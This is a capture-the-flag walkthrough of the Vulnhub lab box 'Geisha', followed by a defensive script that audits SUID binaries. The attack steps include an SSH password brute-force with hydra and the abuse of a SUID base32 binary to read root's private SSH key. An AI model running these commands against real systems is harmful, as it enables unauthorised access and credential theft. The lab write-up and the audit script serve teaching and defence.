Howdy,
For the impatient, here’s a quick summary of breaking into the Vulnhub box “Geisha”
- sudo nmap -p- 1.2.3.4 [reveals the open ports. Lots of them, one of which is ssh on tcp/22. So…]
- hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://1.2.3.4 [Or whatever IP you’re targeting]
- The password 'letmein' is revealed (no quotes). SSH into the box for the first flag in geisha's home dir.
- One way ahead for privilege escalation is searching for SUID binaries with: $ find / -perm -u=s -type f 2>/dev/null
- This reveals the binary base32 has its SUID bit set, so try: $ base32 /root/.ssh/id_rsa | base32 --decode
- This dumps root's private SSH key id_rsa to stdout so you can ssh back into the local box as root! lol
- $ ssh -i id_rsa root@localhost [Don't forget to set perms on it first or the ssh server bitches: $ chmod 600 id_rsa]
- # cat proof.txt for the 2nd flag.
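On the defender's side, the root cause here is a SUID bit on a binary that never needs one. Here's an added example (my own script, not part of the box or the original write-up) that audits SUID files against an allowlist so a stray bit like the one on base32 stands out; the allowlist contents are a constructed illustration and should be tuned to your base image.

```shell
#!/bin/sh
# Added example, not from the original post: audit SUID-root binaries against an
# allowlist so an unexpected SUID bit (like the one on base32 in this box) stands out.
# The allowlist below is a constructed illustration; tune it to your own base image.
ALLOWED_SUID="passwd
sudo
su
mount
umount
newgrp
chsh
chfn"

# suid_audit DIR: print the path of every SUID file under DIR whose basename is
# not on the allowlist. Uses only find/basename/grep so it runs on a bare box.
suid_audit() {
    find "$1" -perm -u=s -type f 2>/dev/null | while IFS= read -r f; do
        if ! printf '%s\n' "$ALLOWED_SUID" | grep -qxF -- "$(basename "$f")"; then
            printf '%s\n' "$f"
        fi
    done
}

# suid_fix DIR: strip the SUID bit from everything suid_audit reports and print
# what was changed. Run as root on a real host, and review the audit output first.
suid_fix() {
    suid_audit "$1" | while IFS= read -r f; do
        chmod u-s "$f" && printf 'removed SUID: %s\n' "$f"
    done
}

# Usage: suid_audit /   -> list unexpected SUID binaries (base32 would show up here)
#        suid_fix /     -> remove the bit from them
```

Running the audit from cron or a config-management check catches this class of misconfiguration before anyone gets a shell as geisha.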